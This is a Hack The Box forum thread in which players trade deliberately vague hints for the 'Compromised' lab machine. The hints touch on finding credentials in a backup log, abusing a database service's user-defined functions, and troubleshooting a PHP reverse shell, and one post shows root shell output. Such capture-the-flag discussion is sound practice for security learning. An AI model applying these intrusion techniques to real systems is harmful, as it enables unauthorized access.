Official Compromised Discussion

123457

Comments

  • edited November 2020

    Hack The Box
    Hi Guys

  • @Vigneshar said:

    Hi Guys

    Hi

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • Can I get some nudge please? I can read files and list dirs. I tried to extract info from proc but none of use. I used m**** to read files of the user home of m**** but couldn't get anything back. I know I need to use s** with m**** but I seem to miss where to get the data that will allow me to do that.

    Hack The Box

  • @abogaida said:

    Can I get some nudge please? I can read files and list dirs. I tried to extract info from proc but none of use. I used m**** to read files of the user home of m**** but couldn't get anything back.

    As well as reading files, what else can you do to them?

    I know I need to use s** with m**** but I seem to miss where to get the data that will allow me to do that.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • Type your comment> @TazWake said:

    @abogaida said:

    Can I get some nudge please? I can read files and list dirs. I tried to extract info from proc but none of use. I used m**** to read files of the user home of m**** but couldn't get anything back.

    As well as reading files, what else can you do to them?

    I know I need to use s** with m**** but I seem to miss where to get the data that will allow me to do that.

    I tried writing them but it didn't work. I see I am restricted to one dir with the m**** user and it is the place that I would like to drop something to allow not to s**

    Hack The Box

  • @abogaida said:

    I tried writing them but it didn't work.

    Possibly investigate how you are using them. There is a lot of stuff in this thread about how to issue the commands in a way which should give you the access you want.

    I see I am restricted to one dir with the m**** user and it is the place that I would like to drop something to allow not to s**

    I never noticed any restrictions like that. It might be worth double-checking what is happening.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • So, I'm pretty sure I know what to do to get from foothold to the next user, but without write-privileges to that certain folder, I have no idea how to achieve this. A certain config setting of the m**** service disallows reading from/writing to that folder (and the "current other" user doesn't have any privileges on that folder, too).
    If anyone could give a nudge in the right direction (or point out my mistake), it would be much appreciated :)


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • @HomeSen said:

    So, I'm pretty sure I know what to do to get from foothold to the next user, but without write-privileges to that certain folder, I have no idea how to achieve this. A certain config setting of the m**** service disallows reading from/writing to that folder (and the "current other" user doesn't have any privileges on that folder, too).
    If anyone could give a nudge in the right direction (or point out my mistake), it would be much appreciated :)

    Have a look to see if the attackers, or someone on the system, left something useful behind. Possibly in the built in tables.

    DM me for more specific language because I appreciate the vagueness here might be confusing.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • edited November 2020

    Thanks, @TazWake. Will look into the other stuff tomorrow. Now it's time for some overdue sleep :D


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • Men im about to say bad words !!! Why in the hell i keep receiving this "WARNING: Failed to daemonise. This is quite common and not fatal. () ". I looked at php functions that are disabled and uploaded another rev-php but none ! FUCK

    Why 50 53R10U5

  • @Jk3r said:

    Men im about to say bad words !!! Why in the hell i keep receiving this "WARNING: Failed to daemonise. This is quite common and not fatal. () ". I looked at php functions that are disabled and uploaded another rev-php but none ! FUCK

    it quite often means something went wrong with Pentestmonkey's reverse PHP shell.

    It doesn't always mean the shell failed so you might want to check if anything is hitting the listener or if something else is the problem.

    If other shells are failing you might need to do some deeper troubleshooting.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • If other shells are failing you might need to do some deeper troubleshooting.

    That's the f**king problem, Im not good at php ! :lol:

    Why 50 53R10U5

  • @TazWake said:

    Have a look to see if the attackers, or someone on the system, left something useful behind. Possibly in the built in tables.

    DM me for more specific language because I appreciate the vagueness here might be confusing.

    The vagueness was just right. Managed to grab user. Thanks :)

    And for the last step, I assume that something else was left behind, somewhere. Guess, I need to enum even more :/


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • @HomeSen said:

    The vagueness was just right. Managed to grab user. Thanks :)

    Phew - glad to have helped a bit.

    And for the last step, I assume that something else was left behind, somewhere. Guess, I need to enum even more :/

    Yeah, they might have changed something to get in through the back door.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • This box FAQ my head off :lol: Anyway rooted !! Thanks @TazWake for the help. Pm if anyone need help ....

    Why 50 53R10U5

  • edited November 2020

    Rooted. What an awesome ride. Thank you @TazWake for the nudges along the way. I really need to dig deeper into Linux forensics.
    Thank you @D4nch3n for a great box. Really loved it from start to finish :)


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • Done & Dusted!

    Boy that trip caused several "Double Palm" / "DOH!!!!" moments as well as "walk away... just walk away..." moments. @TazWake again thank you for your hints and advice in these forums / discussions they were just the nudges I needed without having to "call a friend" :wink:

    Cheers @D4nch3n for the fun / maddening at times machine.

  • Rooted!
    Really interesting BOX!

    Thanks @D4nch3n !

  • edited November 2020

    Got a POC working and can start navigating around the system. With that was able to do research and found a way to circumvent functionality that is disabled. Found a user that shouldn't have a certain setting enabled but he does. Pulled on that thread but it seems that the directoryy I want to write to and the directory that comes back as part of a query with privs are two different ones. Don't know if I can pivot any further or if someone dorked the box on purpose. Any guidance?

    GRID, GPEN

  • @weeeeeeeeee said:

    Got a POC working and can start navigating around the system. With that was able to do research and found a way to circumvent functionality that is disabled. Found a user that shouldn't have a certain setting enabled but he does. Pulled on that thread but it seems that the directoryy I want to write to and the directory that comes back as part of a query with privs are two different ones. Don't know if I can pivot any further or if someone dorked the box on purpose. Any guidance?

    This is on purpose. I suggest taking a look at @TazWake's response, here: https://forum.hackthebox.eu/discussion/comment/87478/#Comment_87478


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • edited November 2020

    Type your comment> @HomeSen said:

    @weeeeeeeeee said:

    Got a POC working and can start navigating around the system. With that was able to do research and found a way to circumvent functionality that is disabled. Found a user that shouldn't have a certain setting enabled but he does. Pulled on that thread but it seems that the directoryy I want to write to and the directory that comes back as part of a query with privs are two different ones. Don't know if I can pivot any further or if someone dorked the box on purpose. Any guidance?

    This is on purpose. I suggest taking a look at @TazWake's response, here: https://forum.hackthebox.eu/discussion/comment/87478/#Comment_87478

    Understood, and thank you for the refresher. I did find that juicy nugget. Was working that avenue but so far hit has been unfruitful. Maybe it's time to use a bigger hammer against it.

    ----Edit: found the right hammer, this box is dope so far. Definitely mirrors some real world applications.

    GRID, GPEN

  • Hi anyone i can dm about user ?

  • Type your comment> @freez3r said:

    Hi anyone i can dm about user ?

    If you shoot me a dm I might be able to help out.

    GRID, GPEN

  • edited November 2020

    id
    uid=0(root) gid=0(root) groups=0(root)
    whoami
    root

    Definitely an interesting privesc technique, gonna keep that one in my back pocket. :wink:

    GRID, GPEN

  • I'm stuck with foothold :( I can browse files and found m***l running but somehow fail to leverage anything to gain user rights. And I think I know what prevents connections from the outside world. I read the hints in this thread and did my best at enumerating. It is very possible that I already found something and just do not know how to leverage it.

    I would be very grateful for hints.

  • Type your comment> @netburger said:

    I'm stuck with foothold :( I can browse files and found m***l running but somehow fail to leverage anything to gain user rights. And I think I know what prevents connections from the outside world. I read the hints in this thread and did my best at enumerating. It is very possible that I already found something and just do not know how to leverage it.

    I would be very grateful for hints.

    Read the b***up, find the log, readt it, and you might find the creds !

    Why 50 53R10U5

  • Type your comment> @Jk3r said:

    Read the b***up, find the log, readt it, and you might find the creds !

    I found them. Because of them I am able to browse files.
    My access is not interactive (is this my mistake?) and I failed to use those creds at any other place.

    Hard to explain it without spoilers. Maybe DM, anyone? :)

  • Hard to explain it without spoilers. Maybe DM, anyone? :)

    Ping me !

    Why 50 53R10U5

  • @netburger said:

    I found them. Because of them I am able to browse files.
    My access is not interactive (is this my mistake?) and I failed to use those creds at any other place.

    Hard to explain it without spoilers. Maybe DM, anyone? :)

    You can use the creds to enumerate a part of the service which allows users to define functions.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • Does anyone have a link, an article, anything, that would help me understand what I'm supposed to do to get user ? I can read files via a very unhandy way of commands, but everything I've tried so far to retrieve informations from the user that shouldn't be able to log in has been a dead end.

    P.S : Generally speaking, if your hint is "Enum" or "Google", don't bother please.

Sign In to comment.